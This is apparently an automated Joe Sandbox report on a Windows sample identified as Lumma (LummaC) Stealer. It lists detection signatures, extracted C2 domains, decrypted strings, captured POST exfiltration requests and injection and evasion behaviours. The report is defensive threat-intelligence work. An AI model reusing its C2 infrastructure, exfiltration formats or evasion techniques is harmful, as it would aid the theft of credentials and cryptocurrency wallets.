Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe
Analysis ID:1436373
MD5:bab05624883fc9d5fe21f6e26c509c80
SHA1:b9dfddb30341606e41f19b369995e1fe619214ae
SHA256:ac9128c77beb18f3e26656a39e6df34964866ce61e8bc2424afca4c45d1aed8d
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe" MD5: BAB05624883FC9D5FE21F6E26C509C80)
    • RegAsm.exe (PID: 6676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "pearcyworkeronej.shop"], "Build id": "uYY3NI--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        No Sigma rule has matched
        Timestamp:05/04/24-22:22:48.334726
        SID:2052368
        Source Port:49731
        Destination Port:53
        Protocol:UDP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:56.178293
        SID:2052369
        Source Port:49735
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:57.267481
        SID:2052369
        Source Port:49736
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:53.534195
        SID:2052369
        Source Port:49734
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:49.603300
        SID:2052369
        Source Port:49731
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:52.371820
        SID:2052369
        Source Port:49733
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:58.672362
        SID:2052369
        Source Port:49737
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:51.059487
        SID:2052369
        Source Port:49732
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:05/04/24-22:22:48.500879
        SID:2052369
        Source Port:49730
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeAvira: detected
        Source: 1.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "pearcyworkeronej.shop"], "Build id": "uYY3NI--"}
        Source: sweetsquarediaslw.shopVirustotal: Detection: 10%Perma Link
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeVirustotal: Detection: 46%Perma Link
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeJoe Sandbox ML: detected
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: boredimperissvieos.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: holicisticscrarws.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: sweetsquarediaslw.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: plaintediousidowsko.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: miniaturefinerninewjs.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: zippyfinickysofwps.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: obsceneclassyjuwks.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: acceptabledcooeprs.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: pearcyworkeronej.shop
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
        Source: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpString decryptor: uYY3NI--
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416682 CryptUnprotectData,1_2_00416682
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FE8F57 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00FE8F57
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0100BA68
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_01038D48
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_01007C08
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0103CCE8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0103CF08
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 4x nop then cmp dword ptr [ebx+ecx*8], FB49C974h0_2_01037E38
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], CCC8066Ah1_2_0043C461
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx1_2_00415470
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+10h]1_2_00424478
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+10h]1_2_00424478
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 5C3924FCh1_2_0043C615
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_0043E8D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al1_2_00426948
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+20h]1_2_004279F5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al1_2_00427059
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000090h]1_2_00413038
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_0043E09F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_004350A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea eax, dword ptr [edi+04h]1_2_0042213D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]1_2_0042213D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [esi]1_2_0043D265
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax1_2_0041D35E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx1_2_0041D35E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+20h]1_2_00428410
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+20h], 00000000h1_2_00411419
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_0043C436
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_0043D4E8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_0043D48A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]1_2_00416555
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], CCC8066Ah1_2_0043C571
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+0Ch]1_2_0043C571
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]1_2_0040D650
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]1_2_00402650
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esi+04h]1_2_004226BD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esi+04h]1_2_00422760
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]1_2_004097F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_004258B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+7Ch], ecx1_2_00426953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]1_2_0043A930
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [00447EE8h]1_2_00424982
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, cx1_2_00428A13
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+ecx*8], FB49C974h1_2_00439A20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_0043EAF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00417ABA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx1_2_0041DB00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9EDBE8FEh1_2_0041DB00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000090h]1_2_00414D32
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax1_2_0041DDC7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, dword ptr [esp+0Ch]1_2_0040FE47
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h1_2_00411E13
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx1_2_0043DE9C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx1_2_0043DEB1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, eax1_2_0041DF3A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, ch1_2_0043DFE0

        Networking

        barindex
        Source: TrafficSnort IDS: 2052368 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (pearcyworkeronej .shop) 192.168.2.4:49731 -> 1.1.1.1:53
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49730 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49731 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49732 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49733 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49734 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49735 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49736 -> 172.67.131.204:443
        Source: TrafficSnort IDS: 2052369 ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI) 192.168.2.4:49737 -> 172.67.131.204:443
        Source: Malware configuration extractorURLs: boredimperissvieos.shop
        Source: Malware configuration extractorURLs: holicisticscrarws.shop
        Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
        Source: Malware configuration extractorURLs: plaintediousidowsko.shop
        Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
        Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
        Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
        Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
        Source: Malware configuration extractorURLs: pearcyworkeronej.shop
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7079Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1392Host: pearcyworkeronej.shop
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585666Host: pearcyworkeronej.shop
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: pearcyworkeronej.shop
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pearcyworkeronej.shop
        Source: RegAsm.exe, 00000001.00000002.1733951463.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pearcyworkeronej.shop/
        Source: RegAsm.exe, 00000001.00000002.1734058125.0000000000EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pearcyworkeronej.shop/api
        Source: RegAsm.exe, 00000001.00000002.1734058125.0000000000EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pearcyworkeronej.shop/apibu4
        Source: RegAsm.exe, 00000001.00000002.1734058125.0000000000EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pearcyworkeronej.shop/s
        Source: RegAsm.exe, 00000001.00000002.1733951463.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pearcyworkeronej.shop:443/api
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.204:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00430520 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00430520
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00430520 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00430520
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00431CAA GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,1_2_00431CAA
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe, 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_8f54870f-c
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_0103D9180_2_0103D918
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_010048980_2_01004898
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_010382280_2_01038228
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_0103D2880_2_0103D288
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_010025780_2_01002578
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_0103D5A80_2_0103D5A8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FECD700_2_00FECD70
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_010354A80_2_010354A8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_010064B80_2_010064B8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_0101FCB80_2_0101FCB8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FDEEE00_2_00FDEEE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_010017780_2_01001778
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FDBE6D0_2_00FDBE6D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_0100E7A80_2_0100E7A8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FE36530_2_00FE3653
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FE3F3F0_2_00FE3F3F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042112E1_2_0042112E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004017B01_2_004017B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004228401_2_00422840
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004218A01_2_004218A0
